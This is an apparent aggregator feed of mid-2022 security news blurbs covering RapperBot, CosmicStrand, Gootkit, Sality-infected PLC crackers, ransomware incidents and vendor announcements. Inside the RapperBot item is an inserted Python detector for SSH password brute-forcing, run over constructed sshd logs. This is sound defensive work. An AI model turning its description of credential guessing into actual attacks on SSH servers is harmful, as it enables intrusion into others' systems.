      IDEX Biometrics and Reltime formed a partnership to jointly develop and market a Web3 biometric payment card including cold storage and digital asset wallets, combined with digital identification. This all-in-one, EMV compliant biometric payment card is anticipated to reach the market in the first half of 2023. The biometric solution based on IDEX Biometrics sensor technology will enable EMV compliant payments alongside Reltime’s global Web3 financial ecosystem’s unique “check-out” feature. Securing fiat and digital asset transactions … More

      The post IDEX Biometrics and Reltime collaborate to launch Web3 biometric payment card appeared first on Help Net Security.

      "

      Autosummary: "


      Data privacy regulation a top three challenge for IoT adopters

      industry
      2022-08-08 https://www.helpnetsecurity.com/2022/08/08/data-privacy-regulation-challenge-iot-adopters/

      Security fears are less of a concern for organizations adopting IoT solutions than they were five years ago, according to a recent study by Wi-SUN Alliance, a global member-based association of industry leading companies driving the adoption of interoperable wireless solutions for use in smart cities, smart utilities, IoT and industrial IoT (IIoT) applications. The Journey to IoT Maturity, a follow-up to Wi-SUN’s ‘state of the nation’ IoT study in 2017, is based … More

      The post Data privacy regulation a top three challenge for IoT adopters appeared first on Help Net Security.

      "

      Autosummary: The Journey to IoT Maturity, a follow-up to Wi-SUN’s ‘state of the nation’ IoT study in 2017, is based on interviews with IT decision makers from UK and US IoT adopters within key industries, including energy and utilities, state and local government, construction, technology, and telecommunications. "


      New IoT RapperBot Malware Targeting Linux Servers via SSH Brute-Forcing Attack

      exploits industry
      2022-08-07 https://thehackernews.com/2022/08/new-iot-rapperbot-malware-targeting.html
      A new IoT botnet malware dubbed RapperBot has been observed rapidly evolving its capabilities since it was first discovered in mid-June 2022. "This family borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai," "

      Autosummary: "Since mid-July, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH servers," the researchers said. "
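The behaviour described above, a burst of SSH password guesses followed by a successful login from the same address, is visible in sshd's own log. The following is an added example (my own code, not from the article or from Fortinet's research) that runs a brute-force detector over constructed sshd log lines. Assumptions: OpenSSH's default syslog wording ("Failed password for ..." / "Accepted password for ..."), a threshold of five failures from one source address inside a 60-second window, and that only a subsequent *password* success counts as the guessing having paid off.

```python
"""
Added example, not code from the article: detect SSH password brute-forcing
(many failures from one source in a short window) and note whether a
password login from that source succeeded afterwards.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the syslog format OpenSSH emits (assumption).
# 203.0.113.7 hammers root/admin/pi and then gets in; 198.51.100.4 is a
# user who mistyped once and then logged in with a key.
SAMPLE_LOG = """\
Aug  7 10:15:01 host sshd[1201]: Failed password for root from 203.0.113.7 port 51002 ssh2
Aug  7 10:15:03 host sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51004 ssh2
Aug  7 10:15:04 host sshd[1205]: Failed password for invalid user pi from 203.0.113.7 port 51006 ssh2
Aug  7 10:15:06 host sshd[1207]: Failed password for root from 203.0.113.7 port 51008 ssh2
Aug  7 10:15:08 host sshd[1209]: Failed password for root from 203.0.113.7 port 51010 ssh2
Aug  7 10:15:09 host sshd[1211]: Accepted password for root from 203.0.113.7 port 51012 ssh2
Aug  7 10:20:00 host sshd[1300]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Aug  7 10:20:30 host sshd[1302]: Accepted publickey for alice from 198.51.100.4 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2022):
    """Parse one sshd auth line into a dict, or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year, so the caller supplies it.
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: {"failures": n, "users": [...], "success_after": bool}} for each
    source address with >= threshold failed logins inside a sliding window."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "Failed"]
        # Sliding window: the i-th and (i+threshold-1)-th failures must be close enough.
        burst_end = None
        for i in range(len(failures)):
            j = i + threshold - 1
            if j < len(failures) and \
                    (failures[j]["ts"] - failures[i]["ts"]).total_seconds() <= window_seconds:
                burst_end = failures[j]["ts"]
                break
        if burst_end is None:
            continue
        # A password success after the burst is the guessing paying off;
        # a public-key success is a different story and is not counted.
        success_after = any(e["result"] == "Accepted" and e["method"] == "password"
                            and e["ts"] >= burst_end for e in evs)
        findings[ip] = {
            "failures": len(failures),
            "users": sorted({e["user"] for e in failures}),
            "success_after": success_after,
        }
    return findings


if __name__ == "__main__":
    for ip, f in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, f)
```

The `success_after` flag is what turns a noisy brute-force alert into an incident: a burst that ends in an accepted password from the same source means the account is now in the attacker's hands and the article's "maintaining remote access" phase has started, so the host, not just the source address, needs attention.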


      Phishy calls and emails play on energy cost increase fears

      industry
      2022-08-07 https://blog.malwarebytes.com/cybercrime/2022/08/phishy-calls-and-emails-play-on-energy-cost-increase-fears/

      We take a look at a wave of scams involving people's fears of increasing energy prices, and how to avoid being caught out.

      The post Phishy calls and emails play on energy cost increase fears appeared first on Malwarebytes Labs.

      "

      Autosummary: If you receive an unexpected call about energy prices or rebates, insist on calling “them” back on their official number, taken from an official website, directly. Posted: August 7, 2022. We take a look at a wave of scams involving people's fears of increasing energy prices, and how to avoid being caught out. "


      Serious cyberattack hits German Chambers of Industry and Commerce (DIHK)

      industry ciber
      2022-08-07 https://securityaffairs.co/wordpress/134121/hacking/dihk-cyberattack.html

      A massive cyberattack hit the website of the German Chambers of Industry and Commerce (DIHK) this week, forcing the organization to shut down its IT systems as a precautionary measure for security reasons. “Due to a possible cyber attack, the […]

      The post Serious cyberattack hits German Chambers of Industry and Commerce (DIHK) appeared first on Security Affairs.

      "

      Autosummary: "


      Phishy calls and emails play on energy cost increase fears

      industry
      2022-08-07 https://www.malwarebytes.com/blog/news/2022/08/blog-post

      Categories: News, Scams

      Tags: scam, phish, email, social engineering, gas, electricity, energy company, rebate, discount, switch

      We take a look at a wave of scams involving people's fears of increasing energy prices, and how to avoid being caught out.

      (Read more...)

      The post Phishy calls and emails play on energy cost increase fears appeared first on Malwarebytes Labs.

      "

      Autosummary: If you receive an unexpected call about energy prices or rebates, insist on calling "them" back on their official number, taken from an official website, directly. Posted: August 6, 2022. We take a look at a wave of scams involving people's fears of increasing energy prices, and how to avoid being caught out. "


      German Chambers of Industry and Commerce hit by "massive" cyberattack

      industry ciber
      2022-08-04 https://www.bleepingcomputer.com/news/security/german-chambers-of-industry-and-commerce-hit-by-massive-cyberattack/
      The Association of German Chambers of Industry and Commerce (DIHK) was forced to shut down all of its IT systems and switch off digital services, telephones, and email servers, in response to a cyberattack. [...] "

      Autosummary: "


      Claroty xDome strengthens cyber and operational resilience for industrial enterprises

      industry
      2022-08-03 https://www.helpnetsecurity.com/2022/08/03/claroty-xdome/

      Claroty released Claroty xDome, a cloud-based industrial cybersecurity platform that drives cyber and operational resilience for modern industrial enterprises. Claroty xDome is the solution that delivers the ease and scalability of SaaS without compromising on the breadth or depth of the visibility, protection, and monitoring controls that are integral to the entire CPS security journey — especially amid the rapid expansion of CPS across the XIoT. According to Gartner, “Over time, the technologies that underpin … More

      The post Claroty xDome strengthens cyber and operational resilience for industrial enterprises appeared first on Help Net Security.

      "

      Autosummary: Claroty xDome is the solution that delivers the ease and scalability of SaaS without compromising on the breadth or depth of the visibility, protection, and monitoring controls that are integral to the entire CPS security journey — especially amid the rapid expansion of CPS across the XIoT. According to Gartner, “Over time, the technologies that underpin critical infrastructure have become more digitized and connected — either to enterprise IT systems and/or to each other — creating cyber-physical systems.” While other SaaS solutions rely solely on passive monitoring, xDome offers this plus other methods, giving customers both effective asset discovery and the ease and scalability of SaaS. A complete XIoT asset inventory is foundational to CPS security, and attaining it requires combining multiple asset discovery methods tailored to each environment’s unique needs. "


      Power semiconductor component manufacturer Semikron suffered a ransomware attack

      exploits ransomware industry
      2022-08-03 https://securityaffairs.co/wordpress/133975/cyber-crime/semikron-cyber-attack.html

      Semikron, a German-based independent manufacturer of power semiconductor components, suffered a ransomware cyberattack. The company employs more than 3,000 people in 24 subsidiaries worldwide, with production sites in Germany, Brazil, China, France, India, Italy, Slovakia and the USA. It confirmed it has suffered a cyberattack conducted by a professional […]

      The post Power semiconductor component manufacturer Semikron suffered a ransomware attack appeared first on Security Affairs.

      "

      Autosummary: "


      Gootkit AaaS malware is still active and uses updated tactics

      exploits industry
      2022-08-02 https://securityaffairs.co/wordpress/133918/malware/gootkit-is-still-active.html

      Gootkit access-as-a-service (AaaS) malware is back with updated tactics and fileless delivery of Cobalt Strike beacons. Gootkit runs on an access-as-a-service model and is used by different groups to drop additional malicious payloads on compromised systems. Gootkit has been known to use fileless techniques to deliver threats such as the SunCrypt and REvil (Sodinokibi) ransomware, Kronos trojans, […]

      The post Gootkit AaaS malware is still active and uses updated tactics appeared first on Security Affairs.

      "

      Autosummary: “When the user downloaded and opened this file, it spawned an obfuscated script which, through registry stuffing, installed a chunk of encrypted codes in the registry and added scheduled tasks for persistence. "


      Semiconductor manufacturer Semikron hit by LV ransomware attack

      exploits ransomware industry
      2022-08-02 https://www.bleepingcomputer.com/news/security/semiconductor-manufacturer-semikron-hit-by-lv-ransomware-attack/
German power electronics manufacturer Semikron has disclosed that it was hit by a ransomware attack that partially encrypted the company's network. [...] "

      Autosummary: "


      Netskope acquires Infiot to provide users with optimized connections between any enterprise location

      industry
      2022-08-02 https://www.helpnetsecurity.com/2022/08/03/netskope-infiot/

      Netskope announced it has acquired Infiot, a pioneer in enabling secure access with zero trust security, network and application optimization, and AI-driven operations. As Netskope Borderless WAN, the addition of Infiot’s technology will enable Netskope customers to apply uniform security and quality of experience (QoE) policies to the widest range of hybrid work needs, from employees at home or on-the-go, to branch offices, ad-hoc point-of-sale systems, and multi-cloud environments. For customers, all of these capabilities … More

      The post Netskope acquires Infiot to provide users with optimized connections between any enterprise location appeared first on Help Net Security.

      "

Autosummary: Netskope Borderless WAN critical use cases include: easy access to Netskope Intelligent SSE services powered by Netskope NewEdge infrastructure; all-in-one intelligent access, routing, wireless WAN, network security, app assurance, and edge compute as an effective way to modernize, simplify and implement SASE architecture; the ability to offload MPLS and eliminate costs by sending more traffic direct-to-net, eliminate backhauling and leverage fixed/mobile connectivity options (such as 4G/5G); better guaranteed WAN connectivity to ensure end-to-end performance, from the “last mile” to the cloud or legacy data center; simplified operational overhead associated with running custom third-party applications. “Today, leaders across IT, security, and networking and the world’s best-known analyst firms agree that the explosion of data and devices, along with the numerous ways that people connect, communicate, and collaborate, make the transformation of both networking and security a critical imperative for businesses and governments.” Relevant to SASE growth, Gartner notes: “By 2024, 80% of SD-WAN deployments will incorporate SSE requirements, up from less than 25% in 2022”; “By 2025, 80% of enterprises will adopt a strategy to unify web, cloud services, and private application access from a single vendor’s SSE platform.” Despite SASE’s popularity, however, confusing vendor messaging often accompanies piecemeal product sets that are spuriously marketed as “SASE.” "


      Threat actor claims to have hacked European manufacturer of missiles MBDA

      industry
      2022-07-31 https://securityaffairs.co/wordpress/133881/data-breach/mbda-alleged-data-breach.html

Threat actors that go online with the moniker Adrastea claim to have hacked the multinational missile manufacturer MBDA. MBDA is a European multinational developer and manufacturer of missiles that resulted from the merger of the main French, British and Italian missile systems companies (Aérospatiale–Matra, BAE Systems, and Finmeccanica (now Leonardo)). The name MBDA is an initialism of the names of the merged missile companies: Matra, BAe Dynamics and Alenia. A threat actor […]

      The post Threat actor claims to have hacked European manufacturer of missiles MBDA appeared first on Security Affairs.

      "

      Autosummary: “The downloaded data contains confidential and closed information about the employees of your company, which took part in the development of closed military projects of MBDA (PLANCTON, CRONOS, CA SIRIUS, EMADS, MCDS, B1NT etc.) and about the commercial activities of your company in the interests of the Ministry of Defense of the European Union (design documentation of the air defense, missile systems and systems of coastal protection, drawings, presentation , video and photo (3D) materials, contract agreements and correspondence with other companies Rampini Carlo, Netcomgroup, Rafael, Thales, ST Electronics etc.).” "


      Ransomware looms large over the cyber insurance industry

      exploits industry
      2022-07-29 https://www.helpnetsecurity.com/2022/07/29/ransomware-cyber-insurance-video/

      A Panaseer survey of global insurers across the UK and US found that 82% are expecting the rise in premiums to continue, with 74% of insurers agreeing that their inability to accurately understand a customer’s security posture is impacting price increases. This Help Net Security video highlights how the increasing cost of ransomware affects global insurers.

      The post Ransomware looms large over the cyber insurance industry appeared first on Help Net Security.

      "

      Autosummary: "


      Fortress Information Security and NetRise form a partnership to extend XIoT offering

      industry
      2022-07-28 https://www.helpnetsecurity.com/2022/07/29/netrise-fortress-information-security/

      NetRise and Fortress Information Security form a strategic partnership. This partnership gives Fortress Information Security’s global customers access to the firmware binary analysis platform. The NetRise team’s experience in data science, machine learning; and software reverse engineering expands Fortress customers’ ability to identify and catalog risk across a much larger set of devices and images. NetRise gains access to a robust route to market for power, oil and gas and manufacturing clients that Fortress serves, … More

      The post Fortress Information Security and NetRise form a partnership to extend XIoT offering appeared first on Help Net Security.

      "

      Autosummary: "


      CosmicStrand UEFI malware found in Gigabyte, ASUS motherboards

      exploits industry
      2022-07-26 https://www.bleepingcomputer.com/news/security/cosmicstrand-uefi-malware-found-in-gigabyte-asus-motherboards/
Since at least 2016, Chinese-speaking hackers have been using malware that lies virtually undetected in the firmware images of some motherboards, one of the most persistent classes of threat, commonly known as a UEFI rootkit. [...] "

Autosummary: Overview of CosmicStrand UEFI malware execution (source: Kaspersky). Mark Lechtik, a former Kaspersky reverse engineer, now at Mandiant, who was involved in the research, explains that the compromised firmware images came with a modified CSMCORE DXE driver, which enables a legacy boot process. "


      Infosec pros want more industry cooperation and support for open standards

      industry
      2022-07-26 https://www.helpnetsecurity.com/2022/07/26/industry-cooperation-open-standards/

      Driven by security operations complexity, 46% of organizations are consolidating or plan on consolidating the number of vendors they do business with. As a result of this drive toward security technology consolidation, 77% of infosec pros would like to see more industry cooperation and support for open standards promoting interoperability. As thousands of cybersecurity technology vendors compete against each other across numerous security product categories, organizations are aiming to optimize all security technologies in their … More

      The post Infosec pros want more industry cooperation and support for open standards appeared first on Help Net Security.

      "

Autosummary: (51%) In addition: 53% tend to purchase, or will in the future purchase, security technology platforms rather than best-of-breed products; 84% believe that a product’s integration capabilities are important, and 86% of respondents say it is either critical or important that best-of-breed products are built for integration with other products; after cost (46%), product integration capabilities are the most important security product consideration for 37% of security professionals. Evaluating “enterprise-class” security vendors: as the security technology market consolidates, “centers of gravity” will become established around a few large vendors and affect future buying strategies; organizations will place more bets on fewer security technology vendors. "


      IoT Botnets Fuels DDoS Attacks – Are You Prepared?

      industry
      2022-07-26 https://threatpost.com/ddos-attacks-prepared/180273/
The increased proliferation of IoT devices paved the way for the rise of IoT botnets that amplify today's DDoS attacks. This is a dangerous warning: the possibility of a sophisticated DDoS attack and a prolonged service outage can prevent businesses from growing. "

Autosummary: Monitor login attempts and create a lookout for spikes; keep IoT devices on protected networks; perform continuous security testing on IoT devices. The Closure: DDoS attacks are the standard intent of an IoT botnet. Further, most IoT devices include serious security issues like weak passwords, open access to management systems, default administrative credentials, or weak security configurations. "


      4 Steps Financial Industry Can Take to Cope With Their Growing Attack Surface

      financial industry
      2022-07-26 https://thehackernews.com/2022/07/4-steps-financial-industry-can-take-to.html
The financial services industry has always been at the forefront of technology adoption, but the 2020 pandemic accelerated the widespread adoption of mobile banking apps, chat-based customer service, and other digital tools. Adobe's 2022 FIS Trends Report, for instance, found that more than half of the financial services and insurance firms surveyed experienced a notable increase in digital/mobile "

Autosummary: Here's the roadmap that financial institutions like Sander Capital Management are following: Step 1 — Knowing their attack surface. Using Pentera to map their web-facing attack surface, they're gathering a complete understanding of their domains, IPs, networks, services, and websites. Manual penetration testing: manual penetration testing allows organizations to see how a bank's controls, for example, stand up to a real-world attack, while providing the added input of the attacker's perspective. In most cases, a cybersecurity team will only receive a CVSS severity rating (none, low, medium, high, or critical) for each issue detected by the scan. "


      Experts Uncover New "CosmicStrand" UEFI Firmware Rootkit Used by Chinese Hackers

      industry
      2022-07-25 https://thehackernews.com/2022/07/experts-uncover-new-cosmicstrand-uefi.html
      An unknown Chinese-speaking threat actor has been attributed to a new kind of sophisticated UEFI firmware rootkit called CosmicStrand. "The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and we noticed that all these images are related to designs using the H81 chipset," Kaspersky researchers said in a new report published today. "This suggests that a common "

      Autosummary: The "shellcodes received from the [command-and-control] server might be stagers for attacker-supplied PE executables, and it is very likely that many more exist," Kaspersky noted, adding it found a total of two versions of the rootkit, one which was used between the end of 2016 and mid-2017, and the latest variant, which was active in 2020. "


      Intel partners with MediaTek to manufacture new chips for a range of smart edge devices

      industry
      2022-07-25 https://www.helpnetsecurity.com/2022/07/26/intel-mediatek/

      Intel and MediaTek announced a partnership to manufacture chips using Intel Foundry Services’ (IFS) process technologies. The agreement is designed to help MediaTek build a supply chain through the addition of a new foundry partner with capacity in the United States and Europe. MediaTek plans to use Intel process technologies to manufacture multiple chips for a range of smart edge devices. IFS offers a manufacturing platform with technologies optimized for high performance, low power and … More

      The post Intel partners with MediaTek to manufacture new chips for a range of smart edge devices appeared first on Help Net Security.

      "

      Autosummary: "


      CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China

      industry
      2022-07-25 https://securityaffairs.co/wordpress/133658/malware/cosmicstrand-uefi-firmware-rootkit.html

Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor. Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. The researchers were not […]

      The post CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China appeared first on Security Affairs.

      "

      Autosummary: The victims identified by the researchers are private individuals located in China, Vietnam, Iran, and Russia, with no link with any organization or industry vertical. "


      Dynatrace enhances its analytics capabilities for modern multicloud environments

      industry
      2022-07-23 https://www.helpnetsecurity.com/2022/07/23/dynatrace-platform-enhancement/

      Dynatrace announced it has enhanced its analytics capabilities for modern multicloud environments by unifying its AI-powered log analytics with its digital experience monitoring (DEM) capabilities, including Session Replay. This latest enhancement to the Dynatrace platform enables development teams to automatically gain deeper insights into specific user journeys by connecting logs to the user sessions that generated them. This additional context allows teams to use the platform’s DEM capabilities to analyze relevant user sessions and behavior … More

      The post Dynatrace enhances its analytics capabilities for modern multicloud environments appeared first on Help Net Security.

      "

      Autosummary: "


      SonicWall fixed critical SQLi in Analytics and GMS products

      industry
      2022-07-23 https://securityaffairs.co/wordpress/133579/security/sonicwall-critical-sqli.html

      Security company SonicWall released updates to address a critical SQL injection (SQLi) flaw in Analytics On-Prem and Global Management System (GMS) products. Security company SonicWall addressed a critical SQL injection (SQLi) vulnerability, tracked as CVE-2022-22280 (CVSS score 9.4), in Analytics On-Prem and Global Management System (GMS) products. “Improper Neutralization of Special Elements used in an […]

      The post SonicWall fixed critical SQLi in Analytics and GMS products appeared first on Security Affairs.

      "

      Autosummary: "


      CommScope partners with Microsoft to help transform industrial manufacturing

      industry
      2022-07-23 https://www.helpnetsecurity.com/2022/07/24/commscope-microsoft/

      CommScope announced that it has collaborated with Microsoft to create a converged private wireless network solution, enabling new low-latency and mobile applications to transform industrial manufacturing. CommScope successfully deployed the combined solution—using Microsoft Azure private MEC and CommScope CBRS access points—in its own manufacturing innovation center in Shakopee, Minnesota. Through this cloud-connected, low-latency private wireless network, CommScope is already improving both the operational efficiency and manufacturing agility of its facilities. This solution brings augmented reality … More

      The post CommScope partners with Microsoft to help transform industrial manufacturing appeared first on Help Net Security.

      "

      Autosummary: "


      How kitemarks are kicking off IoT regulation

      industry
      2022-07-22 https://www.helpnetsecurity.com/2022/07/22/how-kitemarks-are-kicking-off-iot-regulation/

      Regulation of the Internet of Things (IoT) has always been a contentious subject. Those against claim it stymies growth of a nascent industry, while those advocating for it argue it sees the adoption of industry best practices and helps establish standards. In an effort to straddle the divide, the Department for Digital, Culture, Media and Sport (DCMS) launched its Code of Practice back in 2018. Enshrined in this were 13 “Secure by Design” principles aimed … More

      The post How kitemarks are kicking off IoT regulation appeared first on Help Net Security.

      "

Autosummary: Baseline criteria will focus on asset identification, product configuration, data protection, interface access control, software updates, cybersecurity state awareness, documentation, information and query reception, information dissemination, and product education and awareness. The idea is to start with these controls before introducing other requirements further down the line, such as data protection, securely designed software/hardware, privacy, resilience, and user support. These cover issues including passwords and credentials, vulnerabilities and anomalies, software, secure configuration, communications, and usage of data. It differs, however, in that its recommendations are “outcome based”, no single conformity assessment will be adopted, and a single binary label has been suggested to act as a “seal of approval”. "


      SonicWall Issues Patch for Critical Bug Affecting its Analytics and GMS Products

      exploits industry
      2022-07-22 https://thehackernews.com/2022/07/sonicwall-issues-patch-for-critical-bug.html
      Network security company SonicWall on Friday rolled out fixes to mitigate a critical SQL injection (SQLi) vulnerability affecting its Analytics On-Prem and Global Management System (GMS) products. The vulnerability, tracked as CVE-2022-22280, is rated 9.4 for severity on the CVSS scoring system and stems from what the company describes is an "improper neutralization of special elements" used in "

      Autosummary: "


      Siemens Energy joins AWS Partner Network to provide customers with industrial cybersecurity solutions

      industry ciber
      2022-07-22 https://www.helpnetsecurity.com/2022/07/23/siemens-energy-aws/

      Siemens Energy announces it is joining the Amazon Web Services (AWS) Partner Network (APN), a global community of partners that leverage programs, expertise, and resources to build, market, and sell customer offerings. This expanded relationship includes listing Siemens Energy’s Managed Detection and Response (MDR) industrial cyber security solution in AWS Marketplace, a digital catalog that makes it easy for customers to find, compare, and immediately start using the software and services that run on AWS. … More

      The post Siemens Energy joins AWS Partner Network to provide customers with industrial cybersecurity solutions appeared first on Help Net Security.

      "

      Autosummary: “The energy transition relies on seamlessly connecting physical assets with digital technologies to foster innovation, reduce emissions, and improve efficiency, but this future depends on strong cybersecurity across the whole supply chain,” said Leo Simonovich, Vice President and Global Head of Industrial Cyber, Siemens Energy. "


      Senet collaborates with Iota Communications to deliver wireless networks for smart infrastructure sensors

      industry
      2022-07-21 https://www.helpnetsecurity.com/2022/07/22/senet-iota-communications/

      Senet and Iota Communications announced a partnership to deliver LoRaWAN through both 915 MHz unlicensed spectrum and through IotaComm’s 800 MHz FCC-licensed spectrum network connectivity. The initial use cases will be focused on Smart Building, Smart City, and Critical Infrastructure applications. With this collaboration, and in addition to its use of the Senet platform for application and device management, IotaComm has also become a Senet Radio Access Network (RAN) operator and Senet LPWAN Virtual Network … More

      The post Senet collaborates with Iota Communications to deliver wireless networks for smart infrastructure sensors appeared first on Help Net Security.

      "

      Autosummary: Through a combination of sensors, meters, and its Delphi360 wireless connectivity and data analytics platform, IotaComm provides an end-to-end smart building and smart city solution used by building managers, industrial site managers, and city planners to better manage the health, safety, and sustainability goals of their organizations and facilities. "


      ESET Research Podcast: Hot security topics at RSA or mostly hype?

      industry
      2022-07-20 https://www.welivesecurity.com/2022/07/20/eset-research-podcast-hot-security-topics-rsa-or-mostly-hype/

      Listen to Cameron Camp, Juraj Jánošík, and Filip Mazán discuss the use of machine learning in cybersecurity, followed by Cameron’s insights into the security of medical devices

      The post ESET Research Podcast: Hot security topics at RSA or mostly hype? appeared first on WeLiveSecurity

      "

      Autosummary: "


      Industrial cybersecurity leaders are making considerable headway

      industry ciber
      2022-07-18 https://www.helpnetsecurity.com/2022/07/18/industrial-cybersecurity-leaders-making-headway/

      Increased cyber threats and government directives have made cybersecurity a top priority among critical infrastructure organizations. A zero trust security architecture is the gold standard for blocking and containing threats, but there’s been heavy skepticism around the practicality of implementing zero trust in operational technology (OT) environments with the mix of legacy and modern equipment. A study from Wakefield Research suggests that despite this skepticism, industrial cybersecurity leaders are making significant progress. The survey conducted … More

      The post Industrial cybersecurity leaders are making considerable headway appeared first on Help Net Security.

      "

Autosummary: Tactics for accelerating implementations include integrating zero trust into organizational culture (68%); incorporating Identity and Access Management (IAM) practices or tools (66%), while avoiding “rip and replace” of existing networks and systems; setting a formal process to define zero trust goals (60%); and assessing weaknesses in the existing OT security architecture (60%). "


      Beware of password-cracking software for PLCs and HMIs!

      industry
      2022-07-18 https://www.helpnetsecurity.com/2022/07/18/password-cracking-plcs-hmis/

      A threat actor is targeting industrial engineers and operators with trojanized password-cracking software for programmable logic controllers (PLCs) and human-machine interfaces (HMIs), exploiting their pressing needs to turn industrial workstations into dangerous bots. According to Dragos researchers, the adversary seems not to be interested in disrupting industrial processes but making money. The password-cracking software also carries a dropper that infects the machine with Sality malware, which: Uses process injection and file infection to achieve persistence … More

      The post Beware of password-cracking software for PLCs and HMIs! appeared first on Help Net Security.

      "

      Autosummary: These appear to be tailor-made to work on PLCs and HMIs by AutomationDirect, Omron, Siemens, ABB, Delta Automation, Fuji Electric, Mitsubishi Electric, Pro-Face, Vigor Electric, Weintek, Allen-Bradley, Panasonic, Fatek, IDEC Corp., and LG. "


      Hackers Distributing Password Cracking Tool for PLCs and HMIs to Target Industrial Systems

      industry
      2022-07-18 https://thehackernews.com/2022/07/hackers-distributing-password-cracking.html
      Industrial engineers and operators are the target of a new campaign that leverages password cracking software to seize control of Programmable Logic Controllers (PLCs) and co-opt the machines to a botnet. The software "exploited a vulnerability in the firmware which allowed it to retrieve the password on command," Dragos security researcher Sam Hanson said. "Further, the software was a malware "

      Autosummary: "


      ChaosSearch enhances log analytics capabilities to eliminate architectural complexity challenges

      industry
      2022-07-15 https://www.helpnetsecurity.com/2022/07/15/chaossearch-cloud-data-platform/

      ChaosSearch announced enhancements to its log analytics capabilities that make it easier for organizations to conduct exploratory and investigative analytics at scale. Built within the ChaosSearch Cloud Data Platform and now available to all customers, the augmented capabilities eliminate the architectural complexity and challenges created by traditional data platforms and dramatically improve time to insights, data reliability, and cost. The amount and variety of data being generated by businesses has grown exponentially in the last … More

      The post ChaosSearch enhances log analytics capabilities to eliminate architectural complexity challenges appeared first on Help Net Security.

      "

      Autosummary: “If you’re using any of the existing database platforms today, there is simply no way you’re looking at more than one day’s worth of data at a time without an astronomical price tag,” said Thomas Hazel, Founder, CTO, Chief Scientist, ChaosSearch. "


      Samsung introduces 24Gbps GDDR6 DRAM to advance next-generation graphics cards

      industry
      2022-07-15 https://www.helpnetsecurity.com/2022/07/15/samsung-24gbps-gddr6-dram/

      Samsung announced that it has begun sampling the 16-gigabit (Gb) Graphics Double Data Rate 6 (GDDR6) DRAM featuring 24-gigabit-per-second (Gbps) processing speeds. Built on Samsung’s third-generation 10-nanometer-class (1z) process using extreme ultraviolet (EUV) technology, the new memory is designed to significantly advance the graphics performance for next-generation graphics cards (Video Graphics Arrays), laptops and game consoles, as well as artificial intelligence-based applications and high-performance computing (HPC) systems. “The explosion of data now being driven by … More

      The post Samsung introduces 24Gbps GDDR6 DRAM to advance next-generation graphics cards appeared first on Help Net Security.

      "

      Autosummary: "


      The proliferation of money mules and how behavioral biometrics can combat this form of fraud

      financial industry
      2022-07-15 https://www.helpnetsecurity.com/2022/07/15/money-mules-behavioral-biometrics-video/

      In the first half of 2022, BioCatch estimates fraudulent transfers to money mule accounts totaled $3 billion and that there are approximately 2 million mule accounts in the US. Additionally, researchers found that the average mule transaction amount is $1,500 – a low amount to avoid detection when executing mule campaigns at a large scale. In this Help Net Security video, Erin Englund, Threat Analytics Lead at BioCatch, explains what money mules are, why are … More

      The post The proliferation of money mules and how behavioral biometrics can combat this form of fraud appeared first on Help Net Security.

      "

      Autosummary: "


      Password recovery tool infects industrial systems with Sality malware

      exploits industry
      2022-07-15 https://www.bleepingcomputer.com/news/security/password-recovery-tool-infects-industrial-systems-with-sality-malware/
      A threat actor is infecting industrial control systems (ICS) to create a botnet through password "cracking" software for programmable logic controllers (PLCs). [...] "

      Autosummary: Advertised on various social media platforms, the password recovery tools promise to unlock PLC and HMI (human-machine interface) terminals from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Pro-Face, Allen Bradley, Weintek, ABB, and Panasonic. "


      Tainted password-cracking software for industrial systems used to spread P2P Sality bot

      industry
      2022-07-15 https://securityaffairs.co/wordpress/133281/malware/sality-malware-industrial-systems.html

      Dragos researchers uncovered a small-scale campaign targeting industrial engineers and operators with Sality malware. During a routine vulnerability assessment, Dragos researchers discovered a campaign targeting industrial engineers and operators with Sality malware. Threat actors behind the campaign used multiple accounts across several social media platforms to advertise password-cracking software for Programmable Logic Controller (PLC), Human-Machine […]

      The post Tainted password-cracking software for industrial systems used to spread P2P Sality bot appeared first on Security Affairs.

      "

      Autosummary: The password recovery software is advertised as working against industrial systems from ABB, Allen Bradley, Automation Direct, Fuji Electric, LG, Vigor, Mitsubishi, Omron, Panasonic, Pro-Face, Siemens, and Weintek. "


      Kudelski IoT Secure IP increases hardware security for semiconductor manufacturers

      industry
      2022-07-14 https://www.helpnetsecurity.com/2022/07/14/kudelski-iot-secure-ip/

      Kudelski IoT launched its Secure IP portfolio, giving semiconductor manufacturers robust cryptographic capabilities when integrated into their system on chip (SoC) products. Companies benefit from a rich array of security services, which are more powerful integrated in hardware than software, while also enabling compliance with most common industry security standards including NIST, FIPS, PSA and SESIP Level 3 or higher. “Silicon hardware-based security offers better protection from manipulation and interference than its software-based counterpart because … More

      The post Kudelski IoT Secure IP increases hardware security for semiconductor manufacturers appeared first on Help Net Security.

      "

